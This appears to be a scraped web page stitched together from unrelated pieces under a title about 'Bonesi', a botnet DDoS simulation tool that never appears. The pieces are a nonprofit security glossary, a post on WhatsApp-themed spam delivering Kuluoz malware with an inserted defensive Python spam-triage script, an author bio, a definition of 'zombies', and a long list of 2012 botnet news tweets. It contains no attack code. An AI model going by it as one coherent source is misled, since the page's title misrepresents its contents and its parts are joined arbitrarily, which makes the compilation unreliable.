Tools: Bonesi - Simulate an HTTP GET BotNet DDoS Attack

A nonprofit's guide to online security: So you want to learn the lingo?
This year marks the 25th anniversary of the World Wide Web becoming publicly available. For many of us, this is a reminder of just how much the Internet has transformed our daily lives. This rings true for nonprofits too: The Internet has revolutionized the way that nonprofits communicate, fundraise, and recruit volunteers. It has enabled nonprofits like yours to share their mission with a global audience. To raise awareness. And to change the world. 

But the power of the Internet also comes with great responsibility -- namely the need to keep information safe and secure. As a nonprofit, it can be difficult to keep up with online security, especially when terminology seems complicated. Yes, you might have heard of terms like “phishing” or “cookies,” but what do they mean?

Today, you can find the answers with our quick and easy guide to online security terminology. In less than five minutes, you'll be well on the way to helping keep your nonprofit safe on the Internet.

Let’s get started! Here’s a quick guide to familiarize yourself with common lingo and learn how to distinguish terms that are friends vs foes in the online security realm. 


THE BAD GUYS: MALICIOUS ACTIONS/TERMS

  • Advance-fee fraud (419 scams): A scam that tricks victims into sending money to fraudsters on the promise of a much larger payout later. It is most commonly associated with Nigeria; 419 is the section of the Nigerian Criminal Code that covers this kind of fraud.
  • Botnet: A network of computers infected with malicious software without their owners' knowledge and controlled remotely by an attacker. Botnets are rented out or used directly to send spam and malware, steal data, and flood websites with traffic (DDoS attacks). An infected machine in a botnet is often called a "zombie".
  • Malware: Malicious software built to infect devices and systems, gather personal information, gain access to systems, or disrupt the operation of a device or system. Essentially, any software that maliciously alters or compromises a system or device.
  • Phishing / Social Engineering Attack: An attempt by attackers who pose as trustworthy people or businesses (by email, on the phone, or through fake websites) to trick you into handing over personal information such as usernames, passwords and financial details, or into installing malware. The lure is a familiar name and a sense of urgency, not a technical flaw in your computer.
  • Trojans: Malicious programs posing as, or bundled with, legitimate ones, designed to compromise your system. They are usually installed by opening attachments in scam emails or by visiting infected websites. The term comes from the Trojan Horse of Greek mythology.

How to avoid social engineering attacks

THE GOOD GUYS: ONLINE SAFETY TERMS


  • [Internet] Cookie: A small piece of data that a website sends to your browser, which stores it and sends it back on later visits so the site can remember things such as your login session or the items in a shopping basket on an e-commerce site. Cookies are not malicious in themselves, but a stolen login cookie lets an attacker act as you, which is one reason HTTPS matters.
  • Encryption: The process of encoding data, messages, or information so that only authorized parties holding the right key can read it.
  • Firewall: A security system that filters network traffic between your computer (or network) and the Internet according to predetermined rules, allowing trusted traffic and blocking untrusted or non-secure traffic. It is a barrier, not a cure: a firewall does not stop malware you install yourself by opening an attachment.
  • HTTPS (Hypertext Transfer Protocol Secure): The secure version of HTTP, the protocol your browser uses to talk to websites. HTTPS runs HTTP over TLS (see below), so the connection is encrypted and the browser can check that it is really talking to the site named in the address bar. Look for "https://" and the padlock before entering passwords or donation details.
  • Transport Layer Security (TLS): The protocol that encrypts a connection between two computers and lets each side verify whom it is talking to. It is what puts the "S" in HTTPS, and mail servers also use it to protect email in transit, preventing eavesdropping while messages move between email providers. TLS protects data only while it is travelling; it does not encrypt messages sitting in a mailbox.
  • Two-Factor Authentication / Two-Step Verification: A method that requires a second proof of identity in addition to your password. It combines "something you know" (a password) with "something you have" (your phone, or a hardware security key), much like withdrawing money from an ATM, where you need both your PIN and your bank card. Even if a phishing attack captures your password, the attacker still cannot log in without the second factor.

That’s a wrap for now! Pass on these tips to your nonprofit partners to stay safe and secure online, so you can focus on what matters most: changing the world. 


To see if your nonprofit is eligible to participate, review the Google for Nonprofits eligibility guidelines. Google for Nonprofits offers organizations like yours access to Google tools like Gmail, Google Calendar, Google Drive, Google Ad Grants, YouTube for Nonprofits and more at no charge. These tools can help you reach new donors and volunteers, work more efficiently, and tell your nonprofit’s story. Learn more and enroll here.


WhatsApp spam used by ASProx Botnet to Deliver Kuluoz Malware


Photo by: Sean MacEntee




As you probably know, Facebook bought WhatsApp earlier this year for a very large sum, mostly paid in stock. What you might not know is that a lot of spam impersonating WhatsApp is being used by the Asprox botnet to deliver the Kuluoz malware to unsuspecting users. This is not good news any way you look at it. Keep reading if you want to know more about this, as well as what you should do to stay safe.


Here's a look at some of the dates on which WhatsApp-themed spam made Malcovery's "Today's Top Threats" list.


  • September 19, 23, 24, 25, 26
  • October 2, 3, 4, 7, 8, 9, 10, 11, 16, 17, 18, 21, 22, 23, 24, 25
  • November 14
  • January 9, 13, 15, 20, 28


Looking at that list, it's easy to wonder why nothing has been done sooner about the problem, and why Facebook paid so much, in stock, for the company. To be clear, the spam does not come from WhatsApp itself: the criminals are borrowing a familiar brand name so that recipients open the attachment or click the link.


Going back to November of last year, Computerworld published an article reporting that WhatsApp was one of the top five brands imitated in spam to deliver malware. That's quite a bit of recognition, and not the good kind.


Here are some specific ways you can stay safe and avoid Kuluoz and other malware.

  • Use Protection - The very first thing to do is make sure you are running some kind of anti-virus software. The good news is that you don't need to spend a lot of money to get decent protection these days.
  • Update Protection - Having protection software is nice, but if you never update it, there is still a high chance your computer will get infected and stop working correctly. Anti-virus only recognises what it has signatures for, so keep it, and the operating system and browser it runs on, patched.
  • Be Suspicious - If you're not sure about something online, err on the side of caution and don't take unnecessary risks. Even with a brand like WhatsApp, now connected to Facebook, be very careful: an email claiming to be a WhatsApp notification is exactly the lure this campaign uses. Don't open the attachment or click the link; go to the service directly instead.
  • Educate Yourself - Last but certainly not least, make an effort to stay informed about how malware works and the steps you can take to protect yourself from it. This is the best way to keep your computer safe and virus-free.
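To make the "Be Suspicious" advice concrete, here is an added example, not part of the original post: a small mail-triage script that flags a message when it borrows the WhatsApp name while being sent from, or linking to, an unrelated domain, or when it carries an attachment type that spam runs commonly use to deliver malware. Both sample messages are constructed for this example; the list of legitimate brand domains and the list of risky attachment extensions are assumptions, not data from the post.

```python
# Added example (not from the original post): flag brand-impersonating spam of
# the kind described above.  Sample messages are constructed; BRAND_DOMAINS and
# RISKY_EXTENSIONS are assumptions for the demo, not authoritative lists.
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

BRAND = "whatsapp"
BRAND_DOMAINS = {"whatsapp.com", "whatsapp.net"}           # assumption for the demo
RISKY_EXTENSIONS = {".exe", ".scr", ".zip", ".js", ".jar", ".com"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# Constructed sample: a "voice message" lure sent from an unrelated domain with a zip attached.
SPAM_SAMPLE = """From: "WhatsApp Messenger" <notify@wa-alerts-mail.example>
To: donor@nonprofit.example
Subject: You have a new WhatsApp voice message
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Listen to your voice message: http://wa-alerts-mail.example/play?id=42
--b1
Content-Type: application/zip; name="VoiceMessage.zip"
Content-Disposition: attachment; filename="VoiceMessage.zip"
Content-Transfer-Encoding: base64

UEsDBAoAAAAAAA==
--b1--
"""

# Constructed sample: ordinary internal mail with a link, nothing brand-themed.
LEGIT_SAMPLE = """From: "Board Chair" <chair@nonprofit.example>
To: staff@nonprofit.example
Subject: Agenda for Thursday
Content-Type: text/plain

Agenda is at https://docs.example/agenda
"""


def registrable_domain(host: str) -> str:
    """Last two DNS labels; crude (no public-suffix list) but enough for the demo."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def triage(raw_message: str) -> list:
    """Return human-readable findings for one RFC 822 message; empty list = nothing odd."""
    msg = message_from_string(raw_message)
    findings = []

    display_name, address = parseaddr(msg.get("From", ""))
    sender_domain = address.rsplit("@", 1)[-1].lower() if "@" in address else ""
    claims_brand = BRAND in (display_name + " " + msg.get("Subject", "")).lower()

    # The display name or subject says "WhatsApp" but the sending domain is not the brand's.
    if claims_brand and registrable_domain(sender_domain) not in BRAND_DOMAINS:
        findings.append(f"brand impersonation: '{display_name}' sent from {sender_domain or '?'}")

    body = ""
    for part in msg.walk():
        filename = part.get_filename()
        if filename:
            ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
            if ext in RISKY_EXTENSIONS:
                findings.append(f"risky attachment: {filename}")
        elif part.get_content_type() == "text/plain":
            body += part.get_payload(decode=True).decode("utf-8", "replace")

    # Links in a brand-themed mail that lead somewhere other than the brand's own domain.
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname or ""
        if claims_brand and registrable_domain(host) not in BRAND_DOMAINS:
            findings.append(f"off-brand link: {url}")
    return findings


if __name__ == "__main__":
    for finding in triage(SPAM_SAMPLE):
        print("SPAM:", finding)
    print("LEGIT:", triage(LEGIT_SAMPLE))
```

The three checks are deliberately simple: the sender domain versus the claimed brand, the link targets versus the claimed brand, and the attachment type. They catch the pattern the post describes without needing a signature for any particular Kuluoz sample, which is why they keep working after the attachers rotate their files.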


Following the advice above, there's a good chance you'll avoid WhatsApp-themed spam and not get infected with Kuluoz. Still, keep paying attention and keep your anti-virus software updated. If you have had a negative experience with WhatsApp spam, please leave us a comment below.







Guest Post

Written by Jenny Corteza. Jenny deals with staff outsourcing all the time. She's a writer, and dealing with editors and others can sometimes be a problem. Still, she loves writing articles about technology. Go figure.






ZOMBIES

Non-viable financial institutions that are kept alive artificially.

Other meaning (computing): an infected computer under an attacker's remote control; see BOTNET.


           Skype targeted by botnet malware http://tco/OMts7XyK        
2012-10-10 12:15:41 - securitypro2009 : Skype targeted by botnet malware http://tco/OMts7XyK
           Android adware, Zitmo botnets and Romanian hackers, oh my: We're not in Kansas anymore: The third quarter of 20 http://tco/T01wAZNW        
2012-10-09 22:46:35 - obsequens : Android adware, Zitmo botnets and Romanian hackers, oh my: We're not in Kansas anymore: The third quarter of 20 http://tco/T01wAZNW
           RT @helpnetsecurity: Proxy service users download malware, unknowingly join botnet http://tco/mEYbYpka //How ironic        
2012-10-09 22:10:37 - grecs : RT @helpnetsecurity: Proxy service users download malware, unknowingly join botnet http://tco/mEYbYpka //How ironic
           Android adware, Zitmo botnets and Romanian hackers, oh my http://tco/XTSQTT7u        
2012-10-09 21:48:13 - InfosecurityMag : Android adware, Zitmo botnets and Romanian hackers, oh my http://tco/XTSQTT7u
           Proxy service users download malware, unknowingly join botnet http://tco/ysMfdCzG        
2012-10-09 17:05:31 - CanDeger : Proxy service users download malware, unknowingly join botnet http://tco/ysMfdCzG
           Proxy service users download malware, unknowingly join botnet - http://tco/QgTfPr70        
2012-10-09 16:21:37 - helpnetsecurity : Proxy service users download malware, unknowingly join botnet - http://tco/QgTfPr70
           Proxy service users download malware, unknowingly join botnet http://tco/y1VflHPk        
2012-10-09 15:40:38 - DarkOperator : Proxy service users download malware, unknowingly join botnet http://tco/y1VflHPk
           @binjo i will be coming for presenting stuff about analysis Festi botnet ;        
2012-10-09 14:25:32 - matrosov : @binjo i will be coming for presenting stuff about analysis Festi botnet ;
           Proxy service users download malware, unknowingly join botnet http://tco/9YGJkW2n        
2012-10-09 11:20:11 - ITVulnerability : Proxy service users download malware, unknowingly join botnet http://tco/9YGJkW2n
           Infosec - Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/GyHKyL0v        
2012-10-06 19:01:15 - AlertBoot : Infosec - Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/GyHKyL0v
           Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/Hb7cmnNn        
2012-10-06 12:41:42 - gcluley : Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/Hb7cmnNn
           Inside Microsoft's botnet takedowns http://tco/3bYBghJz        
2012-10-06 06:33:42 - securitypro2009 : Inside Microsoft's botnet takedowns http://tco/3bYBghJz
           Scanning botnets are old botnets interesting to see how they are still active and dangerous though http://tco/QjbPwcYh        
2012-10-06 00:37:05 - gianlucaSB : Scanning botnets are old botnets interesting to see how they are still active and dangerous though http://tco/QjbPwcYh
           RT @CyberExaminer: Visualizing the ZeroAccess botnet in Google Earth http://tco/DHAlZgiW #infosec        
2012-10-05 22:20:25 - opexxx : RT @CyberExaminer: Visualizing the ZeroAccess botnet in Google Earth http://tco/DHAlZgiW #infosec
           Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/gfSydpMP        
2012-10-05 22:06:37 - ITVulnerability : Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/gfSydpMP
           Sality botnet spotted stealthily scanning IPv4 address space for vulnerable VoIP--caught on 'network telescope': http://tco/G6M4BM7O        
2012-10-05 21:17:31 - DarkReading : Sality botnet spotted stealthily scanning IPv4 address space for vulnerable VoIP--caught on 'network telescope': http://tco/G6M4BM7O
           Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China: Just over two weeks ago, http://tco/wvJohCv7        
2012-10-05 12:00:39 - EvilFingers : Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China: Just over two weeks ago, http://tco/wvJohCv7
           Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/ez2qnzBS        
2012-10-05 10:01:21 - teksquisite : Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/ez2qnzBS
           http://tco/DJyOCByC - una botnet social        
2012-10-05 08:22:30 - Xyborg : http://tco/DJyOCByC - una botnet social
           Microsoft settles Nitol botnet lawsuit http://tco/MhDAzRxb        
2012-10-05 01:18:51 - ITVulnerability : Microsoft settles Nitol botnet lawsuit http://tco/MhDAzRxb
           Chinese Nitol botnet host back up after Microsoft settles lawsuit http://tco/bAGoDybf        
2012-10-04 19:26:06 - DarkOperator : Chinese Nitol botnet host back up after Microsoft settles lawsuit http://tco/bAGoDybf
           Chinese Nitol botnet host back up after Microsoft settles lawsuit: Owner agrees to chuck nasties down the sinkhole … http://tco/8RSgDaCm        
2012-10-04 19:03:16 - regsecurity : Chinese Nitol botnet host back up after Microsoft settles lawsuit: Owner agrees to chuck nasties down the sinkhole … http://tco/8RSgDaCm
           Chinese Nitol botnet host back up after Microsoft settles lawsuit http://tco/BZMIJaky        
2012-10-04 17:23:35 - kakroo : Chinese Nitol botnet host back up after Microsoft settles lawsuit http://tco/BZMIJaky
           One botnet to rull them all #BoteAR , the new tool that will rull us all from exploit pack        
2012-10-04 16:17:16 - w3af : One botnet to rull them all #BoteAR , the new tool that will rull us all from exploit pack
           @Microsoft settles w/ Chinese site hosting 500 #malware variants preloaded machines with the Nitol botnet malware - http://tco/g3DagHXc        
2012-10-04 11:09:00 - threatpost : @Microsoft settles w/ Chinese site hosting 500 #malware variants preloaded machines with the Nitol botnet malware - http://tco/g3DagHXc
           Zombie-animating malnets increase 300 pourcents in just 6 months: Cybercrooks beef up botnet-powering badness Crybercrooks a… http://tco/N1zlIV2X        
2012-10-04 10:24:18 - regsecurity : Zombie-animating malnets increase 300 pourcents in just 6 months: Cybercrooks beef up botnet-powering badness Crybercrooks a… http://tco/N1zlIV2X
           Microsoft wins permanent settlement against Nitol botnet Computer News http://tco/w80UzNvF        
2012-10-04 07:16:59 - securitypro2009 : Microsoft wins permanent settlement against Nitol botnet Computer News http://tco/w80UzNvF
           NEW: Microsoft wins permanent settlement against Nitol botnet: http://tco/MQf3Ong9        
2012-10-04 03:41:05 - CSOonline : NEW: Microsoft wins permanent settlement against Nitol botnet: http://tco/MQf3Ong9
           US bank site hackers used advanced botnets http://tco/S2XSt8WG        
2012-10-04 03:21:12 - DarkOperator : US bank site hackers used advanced botnets http://tco/S2XSt8WG
           RT @DarkReading: Microsoft hands off Nitol botnet sinkhole operation to Chinese CERT: http://tco/iJZFlsK0 //What        
2012-10-04 00:20:58 - grecs : RT @DarkReading: Microsoft hands off Nitol botnet sinkhole operation to Chinese CERT: http://tco/iJZFlsK0 //What
           RT @Tris_Acatrinei: Lu Un premier moyen de protection contre les botnets est de disposer d’un routeur ^^        
2012-10-03 18:32:21 - bortzmeyer : RT @Tris_Acatrinei: Lu Un premier moyen de protection contre les botnets est de disposer d’un routeur ^^
           Zombie-animating malnets increase 300 pourcents in just 6 months - Cybercrooks beef up botnet-powering badness Crybercrooks a http://tco/5VpKK326        
2012-10-03 17:31:33 - kakroo : Zombie-animating malnets increase 300 pourcents in just 6 months - Cybercrooks beef up botnet-powering badness Crybercrooks a http://tco/5VpKK326
           Zombie-animating malnets increase 300 pourcents in just 6 months: Cybercrooks beef up botnet-powering badnessCrybercrook http://tco/myJgj2iq        
2012-10-03 16:05:24 - obsequens : Zombie-animating malnets increase 300 pourcents in just 6 months: Cybercrooks beef up botnet-powering badnessCrybercrook http://tco/myJgj2iq
           Microsoft hands off Nitol botnet sinkhole operation to Chinese CERT: http://tco/tzTgR3s7        
2012-10-03 14:39:12 - DarkReading : Microsoft hands off Nitol botnet sinkhole operation to Chinese CERT: http://tco/tzTgR3s7
           @codeslack @DouglasBrush Well I don't like to brag about the size of my botnet, but        
2012-10-03 12:13:02 - hal_pomeranz : @codeslack @DouglasBrush Well I don't like to brag about the size of my botnet, but
           US bank website hackers used advanced botnets, diverse tools News http://tco/HBvd7zY9 ecosystem        
2012-10-03 11:33:05 - DrInfoSec : US bank website hackers used advanced botnets, diverse tools News http://tco/HBvd7zY9 ecosystem
           Microsoft wins permanent settlement against Nitol botnet: Microsoft has won a battle to permanently disrupt a ha http://tco/j86MBuCv        
2012-10-03 05:19:53 - hackinthebox : Microsoft wins permanent settlement against Nitol botnet: Microsoft has won a battle to permanently disrupt a ha http://tco/j86MBuCv
           Am I just naive here when I say that the attackers only have ~700 nodes in a hand-built botnet using VPS nodes, not a 20K node botnet        
2012-10-02 10:15:51 - rybolov : Am I just naive here when I say that the attackers only have ~700 nodes in a hand-built botnet using VPS nodes, not a 20K node botnet
           @daviottenheimer @attritionorg @mckeay that botnet winter will block out the sun1 Oh wait, winter is gaming season        
2012-10-02 04:16:48 - TimelessP : @daviottenheimer @attritionorg @mckeay that botnet winter will block out the sun1 Oh wait, winter is gaming season
           RT @unixfreaxjp: #ZeuS botnet no longer needs central command servers, invalidating security mechanisms to detect Zeus http://tco/LWaC3         
2012-10-01 22:56:16 - ChristiaanBeek : RT @unixfreaxjp: #ZeuS botnet no longer needs central command servers, invalidating security mechanisms to detect Zeus http://tco/LWaC3
           Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffinsHackers http://tco/0dxnCC8y        
2012-09-30 09:26:38 - obsequens : Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffinsHackers http://tco/0dxnCC8y
           Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffins Hackers re… http://tco/D92gSxDw        
2012-09-30 03:40:57 - regsecurity : Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffins Hackers re… http://tco/D92gSxDw
           A powerful server doesn't equal a successful DDoS attack Go through 7 examples of crowdsourced opt-in botnet campaigns http://tco/XzusIHFR        
2012-09-29 19:39:08 - danchodanchev : A powerful server doesn't equal a successful DDoS attack Go through 7 examples of crowdsourced opt-in botnet campaigns http://tco/XzusIHFR
           Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffins Hackers http://tco/vbprV69b        
2012-09-29 18:38:16 - ElReg : Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffins Hackers http://tco/vbprV69b
           ZeroAccess botnet large enough to net $100,000 per day for the bad guys http://tco/T3fVZ4aX        
2012-09-29 17:34:35 - klightowler : ZeroAccess botnet large enough to net $100,000 per day for the bad guys http://tco/T3fVZ4aX
           Zombies are attacking America – researchers - Banking sector DDoSers 'used botnets', say security boffins Hackers re http://tco/m6LZefX4        
2012-09-29 17:30:16 - kakroo : Zombies are attacking America – researchers - Banking sector DDoSers 'used botnets', say security boffins Hackers re http://tco/m6LZefX4
           Inside #Microsoft botnet takedowns http://tco/3HZ3Rvdl via @networkworld #infosec        
2012-09-28 15:42:26 - GFISoftware : Inside #Microsoft botnet takedowns http://tco/3HZ3Rvdl via @networkworld #infosec
           That was quick 3322org is back in original hands Did Microsoft's Operation b70 flip-flop No damage done to the botnets        
2012-09-28 12:45:53 - gollmann : That was quick 3322org is back in original hands Did Microsoft's Operation b70 flip-flop No damage done to the botnets
           How to prevent a botnet infection http://tco/xroZxDH6        
2012-09-28 05:50:03 - helpnetsecurity : How to prevent a botnet infection http://tco/xroZxDH6
           New variant of TDL-4 botnet includes capability to generate 'disposable' CC http://tco/M3Q2Darr        
2012-09-28 00:23:06 - securitypro2009 : New variant of TDL-4 botnet includes capability to generate 'disposable' CC http://tco/M3Q2Darr
           New variant of TDL-4 botnet includes capability to generate 'disposable' CC http://tco/ZVMtnkhh        
2012-09-28 00:23:06 - securitypro2009 : New variant of TDL-4 botnet includes capability to generate 'disposable' CC http://tco/ZVMtnkhh
           Over 9 million PCs infected ZeroAccess botnet uncovered | Naked http://tco/IKtbRqS2        
2012-09-28 00:23:06 - securitypro2009 : Over 9 million PCs infected ZeroAccess botnet uncovered | Naked http://tco/IKtbRqS2
           Inside Microsoft botnet takedowns http://tco/IkeuGgO3        
2012-09-28 00:23:06 - securitypro2009 : Inside Microsoft botnet takedowns http://tco/IkeuGgO3
           RT @atttechchannel: ThreatTraq covers new Blackhole Exploit Kit, ZeroAccess botnet and notable network activity - http://tco/603MBVNL #fb        
2012-09-27 12:48:56 - jclausing : RT @atttechchannel: ThreatTraq covers new Blackhole Exploit Kit, ZeroAccess botnet and notable network activity - http://tco/603MBVNL #fb
           New variant of TDL-4 botnet includes capability to generate 'disposable' CC domain names http://tco/fm0q8KhI SC Mag        
2012-09-27 09:44:59 - ITDataSecurity : New variant of TDL-4 botnet includes capability to generate 'disposable' CC domain names http://tco/fm0q8KhI SC Mag
           New variant of TDL-4 botnet includes capability to generate 'disposable' CC domain names - SC Magazine UK http://tco/aqC0iAJ5        
2012-09-27 06:32:37 - SCmagazineUK : New variant of TDL-4 botnet includes capability to generate 'disposable' CC domain names - SC Magazine UK http://tco/aqC0iAJ5
           RT @Donotgiveintoev: @th3j35t3r Wouldn't surprise me if William Welna set up a DotTK account with a botnet http://tco/al2Oo0rk Just a         
2012-09-22 16:15:12 - mosesrenegade : RT @Donotgiveintoev: @th3j35t3r Wouldn't surprise me if William Welna set up a DotTK account with a botnet http://tco/al2Oo0rk Just a
           'Dead' #Flashback botnet descibed as the most widespread Apple Mac malware to date - SC Magazine UK http://tco/UQIfgG6U        
2012-09-22 12:39:47 - SCmagazineUK : 'Dead' #Flashback botnet descibed as the most widespread Apple Mac malware to date - SC Magazine UK http://tco/UQIfgG6U
           'Dead' Flashback botnet descibed as widespread Mac malware to date http://tco/ICRP9TkZ SC Mag        
2012-09-21 22:56:35 - ITDataSecurity : 'Dead' Flashback botnet descibed as widespread Mac malware to date http://tco/ICRP9TkZ SC Mag
           'Dead' Flashback botnet descibed as the most widespread Mac malware to date http://tco/1NwlnU59 SC Mag        
2012-09-21 22:56:35 - ITDataSecurity : 'Dead' Flashback botnet descibed as the most widespread Mac malware to date http://tco/1NwlnU59 SC Mag
           Lucrative ZeroAccess botnet enslaves one million active computers http://tco/5wVpn8c0        
2012-09-21 15:06:46 - ITVulnerability : Lucrative ZeroAccess botnet enslaves one million active computers http://tco/5wVpn8c0
           Lucrative ZeroAccess botnet enslaves one million active computers http://tco/HFjtwRwF        
2012-09-21 03:11:42 - CanDeger : Lucrative ZeroAccess botnet enslaves one million active computers http://tco/HFjtwRwF
           Lucrative ZeroAccess botnet enslaves one million active computers - http://tco/vN98andQ        
2012-09-21 01:02:41 - helpnetsecurity : Lucrative ZeroAccess botnet enslaves one million active computers - http://tco/vN98andQ
           Lucrative ZeroAccess botnet enslaves one million active computers http://tco/A31ClPqV        
2012-09-20 23:14:33 - DarkOperator : Lucrative ZeroAccess botnet enslaves one million active computers http://tco/A31ClPqV
           Infosec - Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/5kV80kxg        
2012-09-20 21:15:01 - AlertBoot : Infosec - Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/5kV80kxg
           New Video's CIC News 19-09-2012: Flame, IE vuln, TDSS botnet http://tco/ZY2cxVHV        
2012-09-20 19:18:26 - privelege : New Video's CIC News 19-09-2012: Flame, IE vuln, TDSS botnet http://tco/ZY2cxVHV
           Over 9 million PCs infected - ZeroAccess botnet uncovered: ZeroAccess is a hugely widespread malware threat that http://tco/5XeYZjME        
2012-09-20 14:38:13 - EvilFingers : Over 9 million PCs infected - ZeroAccess botnet uncovered: ZeroAccess is a hugely widespread malware threat that http://tco/5XeYZjME
           Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/0jShrzpS        
2012-09-20 13:38:30 - ITVulnerability : Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/0jShrzpS
           TDSS/TDL4 'indestructible botnet' is back with 250K victims already http://tco/sHOfe137        
2012-09-20 12:56:02 - InfosecurityMag : TDSS/TDL4 'indestructible botnet' is back with 250K victims already http://tco/sHOfe137
           Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/DSZO3ZUV        
2012-09-20 12:33:03 - securitypro2009 : Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/DSZO3ZUV
           Over 9 million PCs infected – ZeroAccess botnet uncovered, and hackers earning $100,000 per day http://tco/P5oFU3ML        
2012-09-20 11:59:57 - SophosLabs : Over 9 million PCs infected – ZeroAccess botnet uncovered, and hackers earning $100,000 per day http://tco/P5oFU3ML
           News Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/CE6FIdXR        
2012-09-20 10:40:24 - SecurityTube : News Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/CE6FIdXR
           RT @yo9fah Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/N8jBTvws -- mainly in USA, mining BitCoins        
2012-09-20 08:08:36 - sambowne : RT @yo9fah Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/N8jBTvws -- mainly in USA, mining BitCoins
           Over 9 million PCs infected – ZeroAccess botnet uncovered http://tco/IuP2kcsA        
2012-09-20 04:51:12 - gcluley : Over 9 million PCs infected – ZeroAccess botnet uncovered http://tco/IuP2kcsA
           9 million PCs infected with ZeroAccess botnet http://tco/6ptBuLYY        
2012-09-20 03:09:57 - CanDeger : 9 million PCs infected with ZeroAccess botnet http://tco/6ptBuLYY
           Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/YzdEMDgx #security        
2012-09-20 01:45:16 - eEye : Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/YzdEMDgx #security
           Pushdo botnet's smokescreen traffic hits legitimate websites: Aargh, cap'n, the server be like to founder Cybercroo… http://tco/MQNanwXC        
2012-09-19 23:47:12 - regsecurity : Pushdo botnet's smokescreen traffic hits legitimate websites: Aargh, cap'n, the server be like to founder Cybercroo… http://tco/MQNanwXC
           Pushdo botnet's smokescreen traffic hits legitimate websites http://tco/4PzrvZma        
2012-09-19 19:19:14 - kakroo : Pushdo botnet's smokescreen traffic hits legitimate websites http://tco/4PzrvZma
           Microsoft distrupts Nitol botnet, malware hidden in supply chain http://tco/GAreOqau The supply chain risk is a worrying trend        
2012-09-19 19:02:07 - DFMag : Microsoft distrupts Nitol botnet, malware hidden in supply chain http://tco/GAreOqau The supply chain risk is a worrying trend
           Grum Botnet Attempts Another Comeback, Fails Again: The Grum botnet, which Dutch authorities and security resear http://tco/ToLptDPc        
2012-09-19 15:50:07 - EvilFingers : Grum Botnet Attempts Another Comeback, Fails Again: The Grum botnet, which Dutch authorities and security resear http://tco/ToLptDPc
           Pushdo botnet's smokescreen traffic hits legitimate websites • The http://tco/Qa14razo        
2012-09-19 13:38:16 - securitypro2009 : Pushdo botnet's smokescreen traffic hits legitimate websites • The http://tco/Qa14razo
           New version of TDL4 botnet discovered http://tco/I2mP1Wkw via @CSOonline #SaltedHash        
2012-09-19 03:32:27 - BillBrenner70 : New version of TDL4 botnet discovered http://tco/I2mP1Wkw via @CSOonline #SaltedHash
           G+: The Flame CC developers didn't use professional ha-ha AC terms such as bot, botnet, infection,… http://tco/Ew8uDN6P        
2012-09-19 03:17:05 - anton_chuvakin : G+: The Flame CC developers didn't use professional ha-ha AC terms such as bot, botnet, infection,… http://tco/Ew8uDN6P
           RT @mikko: Botnet herders will often rent out access to their botnets, billing in 15 minute increments just like lawyers http://tc         
2012-09-18 21:24:06 - alessiomarziali : RT @mikko: Botnet herders will often rent out access to their botnets, billing in 15 minute increments just like lawyers http://tc
           A botnet is a network of infected PCs that can be controlled remotely Here's what one might look like from space http://tco/LLTK1hTs        
2012-09-18 19:33:29 - FSecure : A botnet is a network of infected PCs that can be controlled remotely Here's what one might look like from space http://tco/LLTK1hTs
           SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Micr http://tco/btDcU5Qx        
2012-09-18 16:24:37 - EvilFingers : SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Micr http://tco/btDcU5Qx
2012-09-18 15:29:49 - ITVulnerability : SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Microsoft http://tco/QxkeiTeQ
2012-09-18 13:23:20 - CoreSecurity : Microsoft applies 'surgical sinkhole' to strangle botnet installed on new PCs via http://tco/atVnSJF8 @gkeizer #malware #cybersecurity
2012-09-18 12:15:26 - teksquisite : SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Microsoft http://tco/wHf9RkY1
2012-09-18 03:49:20 - helpnetsecurity : Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network -
2012-09-18 00:24:54 - gianlucaSB : The Flame CC developers didn't use terms such as bot, botnet, malware or anything related in their control panel http://tco/rqt33kSO
2012-09-17 23:41:48 - AVGFree : Microsoft disrupts Nitol botnet, outs hidden PS malware Search Security http://tco/OHf77UYQ
